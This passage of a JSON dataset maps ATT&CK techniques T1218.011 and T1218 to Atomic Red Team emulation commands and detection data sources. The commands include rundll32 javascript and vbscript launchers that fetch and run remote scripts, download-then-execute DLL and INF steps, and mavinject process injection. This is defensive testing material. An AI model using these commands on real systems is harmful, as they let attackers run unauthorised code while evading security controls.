"data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null + ] + }, + { + "technique_id": "T1218.011", + "command_list": [ + "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct\").Exec();\n", + "rundll32 vbscript:\"\\..\\mshtml,RunHTMLApplication \"+String(CreateObject(\"WScript.Shell\").Run(\"calc.exe\"),0)\n", + "rundll32.exe advpack.dll,LaunchINFSection PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf,DefaultInstall_SingleUser,1,\n", + "rundll32.exe ieadvpack.dll,LaunchINFSection PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf,DefaultInstall_SingleUser,1,\n", + "rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\\PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf\n", + "rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\\PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf\n", + "rundll32.exe url.dll,OpenURL PathToAtomicsFolder\\T1218.011\\src\\index.hta\nrundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\\T1218.011\\src\\akteullen.vbs\n", + "rundll32.exe pcwutl.dll,LaunchApplication %windir%\\System32\\notepad.exe\n", + "rundll32.exe #{input_file}, StartW\n", + "rundll32.exe C:\\Users\\$env:username\\Downloads\\calc.png, StartW\n", + "rundll32.exe #{input_file},#2\n", + "rundll32.exe PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx64.dll,#2\n", + "rundll32.exe shell32.dll,Control_RunDLL #{input_file}\n", + "rundll32.exe shell32.dll,Control_RunDLL PathToAtomicsFolder\\T1047\\bin\\calc.dll\n", + "copy %windir%\\System32\\calc.exe not_an_scr.scr\nrundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr\n" + ], + "commands": [ + { + "command": "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct\").Exec();\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32 vbscript:\"\\..\\mshtml,RunHTMLApplication \"+String(CreateObject(\"WScript.Shell\").Run(\"calc.exe\"),0)\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe advpack.dll,LaunchINFSection PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf,DefaultInstall_SingleUser,1,\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe ieadvpack.dll,LaunchINFSection PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf,DefaultInstall_SingleUser,1,\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\\PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\\PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe url.dll,OpenURL PathToAtomicsFolder\\T1218.011\\src\\index.hta\nrundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\\T1218.011\\src\\akteullen.vbs\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe pcwutl.dll,LaunchApplication %windir%\\System32\\notepad.exe\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe #{input_file}, StartW\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe C:\\Users\\$env:username\\Downloads\\calc.png, StartW\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe #{input_file},#2\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx64.dll,#2\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe shell32.dll,Control_RunDLL #{input_file}\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "rundll32.exe shell32.dll,Control_RunDLL PathToAtomicsFolder\\T1047\\bin\\calc.dll\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + }, + { + "command": "copy %windir%\\System32\\calc.exe not_an_scr.scr\nrundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr\n", + "source": "atomics/T1218.011/T1218.011.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Rundll32" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1218.011", + "display_name": "Signed Binary Proxy Execution: Rundll32", + "atomic_tests": [ + { + "name": "Rundll32 execute JavaScript Remote Payload With GetObject", + "auto_generated_guid": "cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be", + "description": "Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_url": { + "description": "location of the payload", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct" + } + }, + "executor": { + "command": "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:#{file_url}\").Exec();\n", + "name": "command_prompt" + } + }, + { + "name": "Rundll32 execute VBscript command", + "auto_generated_guid": "638730e7-7aed-43dc-bf8c-8117f805f5bb", + "description": "Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.\nTechnique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/\nUpon execution calc.exe will be launched\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "command_to_execute": { + "description": "Command for rundll32.exe to execute", + "type": "String", + "default": "calc.exe" + } + }, + "executor": { + "command": "rundll32 vbscript:\"\\..\\mshtml,RunHTMLApplication \"+String(CreateObject(\"WScript.Shell\").Run(\"#{command_to_execute}\"),0)\n", + "name": "command_prompt" + } + }, + { + "name": "Rundll32 advpack.dll Execution", + "auto_generated_guid": "d91cae26-7fc1-457b-a854-34c8aad48c89", + "description": "Test execution of a command using rundll32.exe with advpack.dll.\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml\nUpon execution calc.exe will be launched\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "inf_to_execute": { + "description": "Local location of inf file", + "type": "String", + "default": "PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Inf file must exist on disk at specified location (#{inf_to_execute})\n", + "prereq_command": "if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf\" -OutFile \"#{inf_to_execute}\"\n" + } + ], + "executor": { + "command": "rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,\n", + "name": "command_prompt" + } + }, + { + "name": "Rundll32 ieadvpack.dll Execution", + "auto_generated_guid": "5e46a58e-cbf6-45ef-a289-ed7754603df9", + "description": "Test execution of a command using rundll32.exe with ieadvpack.dll.\nUpon execution calc.exe will be launched\n\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "inf_to_execute": { + "description": "Local location of inf file", + "type": "String", + "default": "PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Inf file must exist on disk at specified location (#{inf_to_execute})\n", + "prereq_command": "if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf\" -OutFile \"#{inf_to_execute}\"\n" + } + ], + "executor": { + "command": "rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,\n", + "name": "command_prompt" + } + }, + { + "name": "Rundll32 syssetup.dll Execution", + "auto_generated_guid": "41fa324a-3946-401e-bbdd-d7991c628125", + "description": "Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying \"installation failed\" will be opened\n\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "inf_to_execute": { + "description": "Local location of inf file", + "type": "String", + "default": "PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Inf file must exist on disk at specified location (#{inf_to_execute})\n", + "prereq_command": "if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf\" -OutFile \"#{inf_to_execute}\"\n" + } + ], + "executor": { + "command": "rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\\#{inf_to_execute}\n", + "name": "command_prompt" + } + }, + { + "name": "Rundll32 setupapi.dll Execution", + "auto_generated_guid": "71d771cd-d6b3-4f34-bc76-a63d47a10b19", + "description": "Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying \"installation failed\" will be opened\n\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "inf_to_execute": { + "description": "Local location of inf file", + "type": "String", + "default": "PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Inf file must exist on disk at specified location (#{inf_to_execute})\n", + "prereq_command": "if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf\" -OutFile \"#{inf_to_execute}\"\n" + } + ], + "executor": { + "command": "rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\\#{inf_to_execute}\n", + "name": "command_prompt" + } + }, + { + "name": "Execution of HTA and VBS Files using Rundll32 and URL.dll", + "auto_generated_guid": "22cfde89-befe-4e15-9753-47306b37a6e3", + "description": "IcedID uses this TTP as follows:\n rundll32.exe url.dll,OpenURL %PUBLIC%\\index.hta\nTrickbot uses this TTP as follows:\n rundll32.exe URL.dll,FileProtocolHandler C:\\\\..\\\\Detail\\\\akteullen.vbs\n\nIn this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with \"rundll32 spawned wscript\"\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "rundll32.exe url.dll,OpenURL PathToAtomicsFolder\\T1218.011\\src\\index.hta\nrundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\\T1218.011\\src\\akteullen.vbs\n", + "name": "command_prompt" + } + }, + { + "name": "Launches an executable using Rundll32 and pcwutl.dll", + "auto_generated_guid": "9f5d081a-ee5a-42f9-a04e-b7bdc487e676", + "description": "Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "exe_to_launch": { + "description": "Path of the executable to launch", + "type": "Path", + "default": "%windir%\\System32\\notepad.exe" + } + }, + "executor": { + "command": "rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch}\n", + "name": "command_prompt" + } + }, + { + "name": "Execution of non-dll using rundll32.exe", + "auto_generated_guid": "ae3a8605-b26e-457c-b6b3-2702fd335bac", + "description": "Rundll32.exe running non-dll \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_url": { + "description": "Url to download the DLL", + "type": "Url", + "default": "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll" + }, + "input_file": { + "description": "Non-dll file", + "type": "String", + "default": "C:\\Users\\$env:username\\Downloads\\calc.png" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Non-dll file must exist on disk at specified location\n", + "prereq_command": "if (Test-Path #{input_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"#{input_url}\" -OutFile \"#{input_file}\"\n" + } + ], + "executor": { + "name": "powershell", + "command": "rundll32.exe #{input_file}, StartW\n" + } + }, + { + "name": "Rundll32 with Ordinal Value", + "auto_generated_guid": "9fd5a74b-ba89-482a-8a3e-a5feaa3697b0", + "description": "Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer. \nUpon successful execution, Calc.exe will spawn.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_url": { + "description": "Url to download the DLL", + "type": "Url", + "default": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll" + }, + "input_file": { + "description": "DLL File", + "type": "String", + "default": "PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx64.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "DLL file must exist on disk at specified location\n", + "prereq_command": "if (Test-Path #{input_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"#{input_url}\" -OutFile \"#{input_file}\"\n" + } + ], + "executor": { + "name": "command_prompt", + "command": "rundll32.exe #{input_file},#2\n" + } + }, + { + "name": "Rundll32 with Control_RunDLL", + "auto_generated_guid": "e4c04b6f-c492-4782-82c7-3bf75eb8077e", + "description": "Rundll32.exe loading dll with 'control_rundll' within the command-line, loading a .cpl or another file type related to CVE-2021-40444. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_url": { + "description": "Url to download the DLL", + "type": "Url", + "default": "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll" + }, + "input_file": { + "description": "DLL File", + "type": "String", + "default": "PathToAtomicsFolder\\T1047\\bin\\calc.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "DLL file must exist on disk at specified location\n", + "prereq_command": "if (Test-Path #{input_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"#{input_url}\" -OutFile \"#{input_file}\"\n" + } + ], + "executor": { + "name": "command_prompt", + "command": "rundll32.exe shell32.dll,Control_RunDLL #{input_file}\n" + } + }, + { + "name": "Rundll32 with desk.cpl", + "auto_generated_guid": "83a95136-a496-423c-81d3-1c6750133917", + "description": "Rundll32.exe loading an executable renamed as .scr using desk.cpl \nReference: \n - [LOLBAS - Libraries/Desk](https://lolbas-project.github.io/lolbas/Libraries/Desk/)\nSIGMA rules:\n - [SCR File Write Event](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/file_event_win_new_src_file.yml)\n - [Rundll32 InstallScreenSaver Execution](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_rundll32_installscreensaver.yml)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "exe_to_launch": { + "description": "Path of the executable to launch", + "type": "Path", + "default": "%windir%\\System32\\calc.exe" + } + }, + "executor": { + "name": "command_prompt", + "command": "copy #{exe_to_launch} not_an_scr.scr\nrundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr\n", + "cleanup_command": "del not_an_scr.scr" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1218", + "command_list": [ + "mavinject.exe 1000 /INJECTRUNNING #{dll_payload}\n", + "mavinject.exe #{process_id} /INJECTRUNNING PathToAtomicsFolder\\T1218\\src\\x64\\T1218.dll\n", + "SyncAppvPublishingServer.exe \"n; Start-Process calc.exe\"\n", + "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path PathToAtomicsFolder\\T1218\\src\\Win32\\T1218-2.dll\n", + "InfDefaultInstall.exe PathToAtomicsFolder\\T1218\\src\\Infdefaultinstall.inf\n", + "FOR /F \"tokens=2*\" %a in ('reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Winword.exe\" /V PATH') do set microsoft_wordpath=%b\ncall \"%microsoft_wordpath%\\protocolhandler.exe\" \"ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx\"\n", + "#{mwcpath}\\#{mwcname} \"PathToAtomicsFolder\\T1218\\src\\T1218.xml\" output.txt\n", + "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\#{mwcname} \"#{xml_payload}\" output.txt\n", + "#{mwcpath}\\microsoft.workflow.compiler.exe \"#{xml_payload}\" output.txt\n", + "#{renamed_binary} PathToAtomicsFolder\\T1218\\src\\T1218.xml output.txt\n", + "PathToAtomicsFolder\\T1218\\src\\svchost.exe #{xml_payload} output.txt\n", + "#{renamed_binary} #{xml_payload} output.txt\n", + "Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName foo -ModulePath #{module_path}", + "Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath $PWD", + "#{dspath} -S PathToAtomicsFolder\\T1218\\src\\T1218.txt \n", + "C:\\Windows\\System32\\diskshadow.exe -S #{txt_payload} \n", + "wuauclt.exe /UpdateDeploymentProvider PathToAtomicsFolder\\T1218\\bin\\calc.dll /RunHandlerComServer\n", + "Gpscript /logon\n", + "Gpscript /startup\n", + "copy #{Path_ie4uinit} %TEMP%\\ie4uinit.exe\ncopy PathToAtomicsFolder\\T1218\\src\\ieuinit.inf %TEMP%\\ieuinit.inf\n%TEMP%\\ie4uinit.exe -BaseSettings\n", + "copy c:\\windows\\system32\\ie4uinit.exe %TEMP%\\ie4uinit.exe\ncopy #{Path_inf} %TEMP%\\ieuinit.inf\n%TEMP%\\ie4uinit.exe -BaseSettings\n", + "mavinject.exe|SyncAppvPublishingServer.exe" + ], + "commands": [ + { + "command": "mavinject.exe 1000 /INJECTRUNNING #{dll_payload}\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "mavinject.exe #{process_id} /INJECTRUNNING PathToAtomicsFolder\\T1218\\src\\x64\\T1218.dll\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "SyncAppvPublishingServer.exe \"n; Start-Process calc.exe\"\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path PathToAtomicsFolder\\T1218\\src\\Win32\\T1218-2.dll\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "InfDefaultInstall.exe PathToAtomicsFolder\\T1218\\src\\Infdefaultinstall.inf\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "FOR /F \"tokens=2*\" %a in ('reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Winword.exe\" /V PATH') do set microsoft_wordpath=%b\ncall \"%microsoft_wordpath%\\protocolhandler.exe\" \"ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx\"\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "#{mwcpath}\\#{mwcname} \"PathToAtomicsFolder\\T1218\\src\\T1218.xml\" output.txt\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\#{mwcname} \"#{xml_payload}\" output.txt\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "#{mwcpath}\\microsoft.workflow.compiler.exe \"#{xml_payload}\" output.txt\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "#{renamed_binary} PathToAtomicsFolder\\T1218\\src\\T1218.xml output.txt\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "PathToAtomicsFolder\\T1218\\src\\svchost.exe #{xml_payload} output.txt\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "#{renamed_binary} #{xml_payload} output.txt\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName foo -ModulePath #{module_path}", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} 